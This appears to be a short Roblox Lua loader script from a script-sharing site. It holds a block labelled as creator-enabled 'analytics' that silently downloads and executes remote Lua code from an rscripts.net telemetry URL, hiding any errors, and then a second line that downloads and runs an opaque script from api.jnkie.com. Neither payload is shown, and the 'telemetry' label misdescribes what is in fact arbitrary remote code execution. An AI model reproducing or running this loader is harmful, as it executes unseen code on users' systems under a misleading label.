--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=6a55862bc9e4371bd2ce2b3f"))() end) end) --[[rscripts:analytics:end]] loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/0c9bc50c970244a863a77bec57f9ac6463e5e2d9aa26574a1aa0bb6d5d39afb4/download"))()